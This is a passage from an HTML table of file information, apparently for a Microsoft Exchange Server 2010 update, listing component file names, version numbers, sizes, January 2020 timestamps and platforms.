pcclientaccess.coexistence.dll</td><td>14.3.470.0</td><td>24,200</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.dll</td><td>14.3.487.0</td><td>126,672</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.exmonhandler.dll</td><td>14.3.470.0</td><td>73,344</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.handler.dll</td><td>14.3.487.0</td><td>437,968</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.parser.dll</td><td>14.3.470.0</td><td>601,736</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.server.dll</td><td>14.3.487.0</td><td>110,504</td><td>03-Jan-2020</td><td>05:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.eventlog.dll</td><td>14.3.470.0</td><td>23,472</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.rpcclientaccess.service.exe</td><td>14.3.487.0</td><td>89,808</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.dll</td><td>14.3.487.0</td><td>65,232</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.rpcoverhttpautoconfig.eventlog.dll</td><td>14.3.470.0</td><td>29,104</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.saclwatcher.eventlog.dll</td><td>14.3.470.0</td><td>20,912</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.saclwatcherservicelet.dll</td><td>14.3.470.0</td><td>26,976</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.exsearch.exe</td><td>14.3.487.0</td><td>417,488</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.search.exsearchmsg.dll</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.search.native.dll</td><td>14.3.470.0</td><td>138,440</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.security.dll</td><td>14.3.487.0</td><td>192,208</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.exchange.servicehost.eventlog.dll</td><td>14.3.470.0</td><td>20,400</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Microsoft.exchange.servicehost.exe</td><td>14.3.487.0</td><td>35,752</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.dll</td><td>14.3.487.0</td><td>3,145,424</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.services.eventlogs.dll</td><td>14.3.470.0</td><td>32,688</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.setup.acquirelanguagepack.dll</td><td>14.3.470.0</td><td>52,872</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.common.dll</td><td>14.3.470.0</td><td>454,280</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.exsetupuihelper.dll</td><td>14.3.470.0</td><td>216,712</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.setup.signverfwrapper.dll</td><td>14.3.470.0</td><td>74,376</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.sqm.dll</td><td>14.3.470.0</td><td>65,224</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.storedriver.dll</td><td>14.3.487.0</td><td>556,752</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.storedriver.eventlog.dll</td><td>14.3.470.0</td><td>23,472</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.storeprovider.dll</td><td>14.3.470.0</td><td>859,784</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.structuredquery.dll</td><td>14.3.470.0</td><td>159,944</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.agent.antispam.common.dll</td><td>14.3.470.0</td><td>77,448</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.contentfilter.cominterop.dll</td><td>14.3.470.0</td><td>29,320</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.headerconversion.dll</td><td>14.3.470.0</td><td>26,248</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.hygiene.dll</td><td>14.3.470.0</td><td>233,096</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.liveidauth.dll</td><td>14.3.470.0</td><td>23,680</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.prioritization.dll</td><td>14.3.470.0</td><td>44,680</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.protocolanalysis.dbaccess.dll</td><td>14.3.470.0</td><td>65,160</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.senderid.core.dll</td><td>14.3.470.0</td><td>73,352</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.agent.trustedmailagents.dll</td><td>14.3.487.0</td><td>57,040</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.dll</td><td>14.3.487.0</td><td>1,916,624</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.eventlog.dll</td><td>14.3.470.0</td><td>104,368</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.logging.search.dll</td><td>14.3.470.0</td><td>102,024</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.dll</td><td>14.3.487.0</td><td>442,064</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.common.eventlog.dll</td><td>14.3.470.0</td><td>18,888</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.dll</td><td>14.3.487.0</td><td>1,072,848</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.transport.sync.worker.eventlog.dll</td><td>14.3.470.0</td><td>21,936</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.exchange.transportlogsearch.eventlog.dll</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.um.clientstrings.dll</td><td>14.3.470.0</td><td>77,448</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.lad.dll</td><td>14.3.470.0</td><td>123,528</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.um.prompts.dll</td><td>14.3.470.0</td><td>212,616</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.troubleshootingtool.shared.dll</td><td>14.3.470.0</td><td>102,024</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.ucmaplatform.dll</td><td>14.3.487.0</td><td>188,112</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcommon.dll</td><td>14.3.487.0</td><td>765,856</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.um.umcore.dll</td><td>14.3.487.0</td><td>1,384,144</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.unifiedmessaging.eventlog.dll</td><td>14.3.470.0</td><td>108,976</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Microsoft.managementgui.dll</td><td>14.3.470.0</td><td>155,336</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools.dll</td><td>14.3.470.0</td><td>89,800</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Microsoft.powershell.hostingtools_2.dll</td><td>14.3.470.0</td><td>89,800</td><td>03-Jan-2020</td><td>05:45</td><td>x86</td></tr><tr><td>Migbase.dll</td><td>14.3.470.0</td><td>783,792</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Migmsg.dll</td><td>14.3.470.0</td><td>91,560</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Migrateumcustomprompts.ps1</td><td>Not applicable</td><td>16,986</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Moveallreplicas.ps1</td><td>Not applicable</td><td>13,043</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Movemailbox.ps1</td><td>Not applicable</td><td>56,868</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Movetransportdatabase.ps1</td><td>Not applicable</td><td>28,466</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Msallog.dll</td><td>14.3.470.0</td><td>46,504</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Msexchangeadtopologyservice.exe</td><td>14.3.470.0</td><td>114,096</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Msexchangefds.exe</td><td>14.3.470.0</td><td>110,280</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangelesearchworker.exe</td><td>14.3.487.0</td><td>89,808</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Msexchangemailboxassistants.exe</td><td>14.3.487.0</td><td>802,512</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangemailboxreplication.exe</td><td>14.3.470.0</td><td>27,272</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangemailsubmission.exe</td><td>14.3.487.0</td><td>118,480</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangerepl.exe</td><td>14.3.487.0</td><td>69,328</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangethrottling.exe</td><td>14.3.470.0</td><td>48,840</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangetransport.exe</td><td>14.3.470.0</td><td>81,544</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Msexchangetransportlogsearch.exe</td><td>14.3.487.0</td><td>212,688</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Msfte1.dll</td><td>14.0.7177.5001</td><td>3,228,440</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Msgedt.js</td><td>Not applicable</td><td>4,778</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Msglst.js</td><td>Not applicable</td><td>3,295</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Newtestcasconnectivityuser.ps1</td><td>Not applicable</td><td>20,120</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Newtestcasconnectivityuserhosting.ps1</td><td>Not applicable</td><td>22,443</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Ntspxgen.dll</td><td>14.3.470.0</td><td>87,472</td><td>03-Jan-2020</td><td>05:45</td><td>x64</td></tr><tr><td>Oabgen.dll</td><td>14.3.470.0</td><td>356,784</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Ocemul.dll</td><td>8.5.3.76</td><td>54,112</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Oilink.dll</td><td>8.5.3.76</td><td>464,736</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Oilink.exe</td><td>8.5.3.76</td><td>317,280</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Oilink.jar</td><td>Not applicable</td><td>1,425,202</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Oitnsf.id</td><td>Not applicable</td><td>4,688</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Oit_font_metrics.db</td><td>Not applicable</td><td>375,808</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Oleconverter.exe</td><td>14.3.470.0</td><td>162,736</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Oswin64.dll</td><td>8.5.3.76</td><td>103,272</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Outsidein.dll</td><td>8.5.3.76</td><td>296,296</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Owaauth.dll</td><td>14.3.470.0</td><td>104,880</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Owasl.xap</td><td>Not applicable</td><td>36,280</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Owasmime.msi</td><td>Not applicable</td><td>2,297,856</td><td>03-Jan-2020</td><td>05:45</td><td>Not applicable</td></tr><tr><td>Owaspell.dll</td><td>14.3.470.0</td><td>50,608</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Perfnm.h</td><td>Not applicable</td><td>47,627</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Perf_common_extrace.dll</td><td>14.3.470.0</td><td>170,416</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Perf_exchmem.dll</td><td>14.3.470.0</td><td>71,600</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Perf_mdbsz.dll</td><td>14.3.470.0</td><td>56,752</td><td>03-Jan-2020</td><td>05:50</td><td>x64</td></tr><tr><td>Policytest.exe</td><td>14.3.470.0</td><td>51,632</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Preparemoverequesthosting.ps1</td><td>Not applicable</td><td>68,859</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Prepare_moverequest.ps1</td><td>Not applicable</td><td>69,054</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Publishedstartpage.js</td><td>Not applicable</td><td>15,353</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Quietexe.exe</td><td>14.3.470.0</td><td>21,640</td><td>03-Jan-2020</td><td>05:47</td><td>x86</td></tr><tr><td>Readpost.aspx</td><td>Not applicable</td><td>6,516</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Readsharingmessage.ascx</td><td>Not applicable</td><td>5,235</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Readvoicemailmessage.aspx</td><td>Not applicable</td><td>9,320</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Redir.aspx</td><td>Not applicable</td><td>1,714</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Redistributeactivedatabases.ps1</td><td>Not applicable</td><td>114,387</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Reenable_auditloggingagent.ps1</td><td>Not applicable</td><td>12,395</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Reinstalldefaulttransportagents.ps1</td><td>Not applicable</td><td>20,402</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Remoteexchange.ps1</td><td>Not applicable</td><td>19,447</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Removereplicafrompfrecursive.ps1</td><td>Not applicable</td><td>13,887</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Removeuserfrompfrecursive.ps1</td><td>Not applicable</td><td>13,191</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Replacereplicaonpfrecursive.ps1</td><td>Not applicable</td><td>14,292</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Replaceuserpermissiononpfrecursive.ps1</td><td>Not applicable</td><td>13,551</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Replaceuserwithuseronpfrecursive.ps1</td><td>Not applicable</td><td>13,547</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Replaycrimsonevents.man</td><td>Not applicable</td><td>247,121</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Replaycrimsonmsg.dll</td><td>14.3.470.0</td><td>266,440</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Resetattachmentfilterentry.ps1</td><td>Not applicable</td><td>13,332</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Resetcasservice.ps1</td><td>Not applicable</td><td>19,563</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Resetsearchindex.ps1</td><td>Not applicable</td><td>14,653</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Reset_antispamupdates.ps1</td><td>Not applicable</td><td>12,017</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Resumemailboxdatabasecopy.ps1</td><td>Not applicable</td><td>15,126</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Rightsmanagementwrapper.dll</td><td>14.3.470.0</td><td>86,440</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Rollalternateserviceaccountpassword.ps1</td><td>Not applicable</td><td>53,296</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Routingview.exe</td><td>14.3.470.0</td><td>167,560</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Rulesauditmsg.dll</td><td>14.3.470.0</td><td>18,864</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Sccanno.dll</td><td>8.5.3.76</td><td>136,552</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccca.dll</td><td>8.5.3.76</td><td>46,944</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccch.dll</td><td>8.5.3.76</td><td>201,056</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccda.dll</td><td>8.5.3.76</td><td>151,904</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccdu.dll</td><td>8.5.3.76</td><td>617,824</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccex.dll</td><td>8.5.3.76</td><td>94,560</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccfa.dll</td><td>8.5.3.76</td><td>86,880</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccfi.dll</td><td>8.5.3.76</td><td>143,712</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccfmt.dll</td><td>8.5.3.76</td><td>75,616</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccfnt.dll</td><td>8.5.3.76</td><td>504,160</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccfut.dll</td><td>8.5.3.76</td><td>862,560</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccimg.dll</td><td>8.5.3.76</td><td>426,848</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccind.dll</td><td>8.5.3.76</td><td>68,960</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Scclo.dll</td><td>8.5.3.76</td><td>162,656</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccole2.dll</td><td>8.5.3.76</td><td>30,568</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccsd.dll</td><td>8.5.3.76</td><td>43,360</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccut.dll</td><td>8.5.3.76</td><td>2,001,248</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Sccxt.dll</td><td>8.5.3.76</td><td>54,624</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Servicecontrol.ps1</td><td>Not applicable</td><td>45,721</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Setup.com</td><td>14.3.470.0</td><td>444,928</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Setup.exe</td><td>14.3.470.0</td><td>603,568</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>Smimeoptions.aspx</td><td>Not applicable</td><td>10,805</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Smimeparameterstandalone.js</td><td>Not applicable</td><td>10,566</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Smtpreceiveperfcounters.h</td><td>Not applicable</td><td>1,014</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Smtpreceiveperfcounters.ini</td><td>Not applicable</td><td>11,910</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Smtpreceiveperfcounters.xml</td><td>Not applicable</td><td>3,439</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Smtpsendperfcounters.h</td><td>Not applicable</td><td>739</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Smtpsendperfcounters.ini</td><td>Not applicable</td><td>8,488</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Smtpsendperfcounters.xml</td><td>Not applicable</td><td>2,527</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Startdagservermaintenance.ps1</td><td>Not applicable</td><td>22,566</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Startpage.aspx</td><td>Not applicable</td><td>10,891</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Startpage.js</td><td>Not applicable</td><td>177,388</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Stopdagservermaintenance.ps1</td><td>Not applicable</td><td>15,837</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Store.exe</td><td>14.3.470.0</td><td>6,941,640</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Storetsconstants.ps1</td><td>Not applicable</td><td>15,592</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Storetslibrary.ps1</td><td>Not applicable</td><td>25,360</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Store_mapi_net_bin_perf_x64_exrpcperf.dll</td><td>14.3.470.0</td><td>37,296</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Tokenm.dll</td><td>14.3.470.0</td><td>66,984</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Transcodingservice.exe</td><td>14.3.470.0</td><td>130,992</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Troubleshoot_ci.ps1</td><td>Not applicable</td><td>24,393</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Troubleshoot_databaselatency.ps1</td><td>Not applicable</td><td>23,679</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Troubleshoot_databasespace.ps1</td><td>Not applicable</td><td>29,030</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Uglobal.js</td><td>Not applicable</td><td>984,109</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Umservice.exe</td><td>14.3.470.0</td><td>147,080</td><td>03-Jan-2020</td><td>05:46</td><td>x86</td></tr><tr><td>Umworkerprocess.exe</td><td>14.3.470.0</td><td>56,968</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Uninstall_antispamagents.ps1</td><td>Not applicable</td><td>12,489</td><td>03-Jan-2020</td><td>05:48</td><td>Not applicable</td></tr><tr><td>Updatecas.ps1</td><td>Not applicable</td><td>16,662</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Updateconfigfiles.ps1</td><td>Not applicable</td><td>24,906</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Uview.js</td><td>Not applicable</td><td>178,233</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Vlv.js</td><td>Not applicable</td><td>140,614</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Vsacad.dll</td><td>8.5.3.76</td><td>14,228,832</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsacs.dll</td><td>8.5.3.76</td><td>41,824</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsami.dll</td><td>8.5.3.76</td><td>74,592</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsarc.dll</td><td>8.5.3.76</td><td>24,928</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsasf.dll</td><td>8.5.3.76</td><td>34,144</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsbdr.dll</td><td>8.5.3.76</td><td>27,488</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsbmp.dll</td><td>8.5.3.76</td><td>35,168</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vscdrx.dll</td><td>8.5.3.76</td><td>22,880</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vscgm.dll</td><td>8.5.3.76</td><td>53,600</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdbs.dll</td><td>8.5.3.76</td><td>26,464</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdez.dll</td><td>8.5.3.76</td><td>31,072</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdif.dll</td><td>8.5.3.76</td><td>25,952</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdrw.dll</td><td>8.5.3.76</td><td>36,192</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdx.dll</td><td>8.5.3.76</td><td>30,560</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdxla.dll</td><td>8.5.3.76</td><td>32,096</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsdxlm.dll</td><td>8.5.3.76</td><td>80,224</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsemf.dll</td><td>8.5.3.76</td><td>64,864</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsen4.dll</td><td>8.5.3.76</td><td>32,096</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsens.dll</td><td>8.5.3.76</td><td>29,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsenw.dll</td><td>8.5.3.76</td><td>29,024</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vseps.dll</td><td>8.5.3.76</td><td>23,904</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vseshr.dll</td><td>8.5.3.76</td><td>188,768</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsexe2.dll</td><td>8.5.3.76</td><td>53,088</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsfax.dll</td><td>8.5.3.76</td><td>26,464</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsfcd.dll</td><td>8.5.3.76</td><td>27,488</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsfcs.dll</td><td>8.5.3.76</td><td>31,072</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsfft.dll</td><td>8.5.3.76</td><td>29,536</td><td>03-Jan-2020</td><td>05:49</td><td>x64</td></tr><tr><td>Vsflw.dll</td><td>8.5.3.76</td><td>